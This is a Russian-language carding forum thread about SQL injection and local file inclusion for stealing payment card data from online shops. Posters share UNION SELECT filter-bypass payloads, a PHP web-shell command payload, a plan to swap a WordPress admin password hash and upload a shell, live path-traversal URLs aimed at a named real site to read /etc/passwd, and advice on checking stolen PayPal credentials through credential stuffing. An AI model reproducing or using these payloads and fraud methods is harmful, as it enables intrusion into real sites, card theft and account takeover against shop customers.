Видео: SQL - инъекция, добыча картона.

[sergaj]

Если вордпресс - забей. Там в дефолте пассы вида примерно 5p#0)R92)z@

Много раз сталкивался и сам.
Нужно смотреть права на запись. Если возможно, сохранить хэш админа, сменить на свой на 5 минут. Затем залогиниться - посливать, что нужно (можно шелл залить если нет). Ну и в конце сменить пасс на по дефоулту, т.е. на админский. Но опять-таки, все зависит от прав на запись и способа проникновения.

 

[Passion]

goldeff , попробуйте найти уязвимость пхп инклуид и через нее залить веб_шелл.

 

[Vasders]

Passion, если можешь, то сделай видосик про инклудинг.

 

[Passion]

Хорошо, на днях сделаю.

 

[sergaj]

Есть ли способ обойти фильтр по ЮНИОН?

 

[Мёртвый]

Есть ли способ обойти фильтр по ЮНИОН?

/**/uni--on/**/se--lect/**/

/**//*!union*/+/*!select*/

/*!UnIoN+SeLeCt*/

 

[Passion]

Мёртвый, ответил, а я добавлю.
Если в прикол руками крутить - крути.
Есть же софт, заряжай в него и пусть он крутит. Так быстрее.

 

[Мёртвый]

Мёртвый, ответил, а я добавлю.
Если в прикол руками крутить - крути.
Есть же софт, заряжай в него и пусть он крутит. Так быстрее.

а что за софт который фильтрует юнион?
от пашкелы тузла ?

 

[reliz]

нашел шоп, начал искать картон, в 3 таблицах не оказалось, но когда 4 открыл, глаза полезли на лоб , но попытавшись дампнуть колонки с инфо сс пишет

Turning off 'bypass illegal union' and retrying!

В колонке cc_exp_m & cc_exp_y часто проскакивают зашифрованные данные вроде

pZjWON7+zhw=

Можно ли как-то обойти этот "bypass illegal union" ?

Картона много, судя по кол-ву появляющихся пустых строк и шифрованных дат экспа в них

 

[Vasders]

"bypass illegal union"

Значит ячейки таблицы пусты. То есть картон затерт.

Что можно извлечь полезного из локального инклуда? Есть доступ к:
pure-ftpd.conf
/etc/passwd
cpanel.config
Лог файлы не открываются, пишет
Fatal error: Allowed memory size of 50331648 bytes exhausted (tried to allocate 404 bytes) in /usr/local/apache/logs/error_log on line 116514

 

[PokerLife]

нашел шоп, начал искать картон, в 3 таблицах не оказалось, но когда 4 открыл, глаза полезли на лоб , но попытавшись дампнуть колонки с инфо сс пишет
В колонке cc_exp_m & cc_exp_y часто проскакивают зашифрованные данные вроде

Можно ли как-то обойти этот "bypass illegal union" ?

Картона много, судя по кол-ву появляющихся пустых строк и шифрованных дат экспа в них

Плюнь - ничего не выйдет у тебя......Единственный вариант если есть доступ к админке.Да и то будут идти данные не свежий картон.Подробней выше описывал Passion

 

[sergaj]

Ситуация: кручу блинд-инжект. базу определило. юзера тоже. физ. путь к серваку есть. но вот инфо. схема отсутствует. попытался подобрать наугад. результат "0".
Вопрос: возможно ли что майэскюэль не отвечает при запросе с правильным именем таблицы в запросе? или же стоит продолжать.
п.с. движ. коммерч. и походу там как-то с префиксом к таблицам что-то мутиццо(

---------- Сообщение добавлено в 11:13 ---------- Предыдущее сообщение размещено в 10:45 ----------

Что можно извлечь полезного из локального инклуда? Есть доступ к:
pure-ftpd.conf
/etc/passwd
cpanel.config
Лог файлы не открываются, пишет
Fatal error: Allowed memory size of 50331648 bytes exhausted (tried to allocate 404 bytes) in /usr/local/apache/logs/error_log on line 116514

Если позволишь, то подскажу. Насчет видео по LFI - вбей в гугл. на вкладке видео. там не ютубе много интересного по теме.
LFI вообще возникает из-за неправильной настойки сервака. А способов проинклудить много. От логов апача, до вебализера и даже почтового сервиса на серваке.
Самый простой лок.инклуд при allow_url_include = On можно попробовать после переменной в строке браузера прописать. <?php system($_GET[cmd]); ?>?&cmd=ls

 

[Vasders]

Да как инклудить я в курсе.
Я про другое спрашиваю - в этих или каких-то еще файлах может быть ценная инфа типа паса к панели или бд?

 

[sergaj]

Да как инклудить я в курсе.
Я про другое спрашиваю - в этих или каких-то еще файлах может быть ценная инфа типа паса к панели или бд?

в etc/passwd как я знаю, уже давно ничего ценного не найти. про остальеные файлы не вкурсе. пассы от мускула в конфиге мускула.

 

[PokerLife]

Такой вопрос - вскрыл небольшой шоп.Данные вообще не зашифрованы.База не очень большая,но все же.Есть данные - мыло,пасс,сс инфа,доб,адрес,но не у всех юзеров.Часть из них идет без данных сс.Мерч в шопе от Палки.Логично предположить, что юзвери у которых данные сс не указаны уже в ней реганы были при оплате.

Я прав ??? Думаю есть ли смысл заморачиваться с чеком на палку....

 

[Vasders]

Да, прав.
Если база маленькая, то не имеет имхо. Да и как ты чекать будешь? Руками? Если чекер покупать, то явно не стоит.

 

[PokerLife]

Да, прав.
Если база маленькая, то не имеет имхо. Да и как ты чекать будешь? Руками? Если чекер покупать, то явно не стоит.

База реально маленькая....Около 1к записей....Думаю для начала прочекать мыльники тупо..Наткнусь где на месагги палки может и заморочусь..Никогда с ней дело особо не имел...

 

[Vasders]

Да забей.
Палка делается так: покупаешь чекер (у кибера есть) и берешь где-то базу мыло:пасс. Часто ведь у народа совпадают пассы от акков. И вот ее чекаешь на предмет подходит к палки или нет.
Чекать 1к не имеет смысла имхо.

Подскажите, ищу локальные инклуды. Логов так ни разу и не видел, ибо где они доступны вылазит:

Fatal error: Allowed memory size of 50331648 bytes exhausted (tried to allocate 403 bytes) in /usr/local/apache/logs/error_log on line 116520

Это значит все, можно забить?

 

[Passion]

Аха, можешь забить или скинь линк в ПМ, посмотрю.

ищу локальные инклуды. Логов так ни разу и не видел

Вот они.

samanta.nakedamateurs.nl/fotos/fotos/index.php?pagina=../../../../../../etc/syslog.conf
samanta.nakedamateurs.nl/fotos/fotos/index.php?pagina=../../../../../../etc/passwd
samanta.nakedamateurs.nl/fotos/fotos/index.php?pagina=../../../../../../etc/hosts

 

[Vasders]

Это не логи)
Впрочем я уже ответ на свой вопрос уже нашел: забить, сделать с этим ничего нельзя.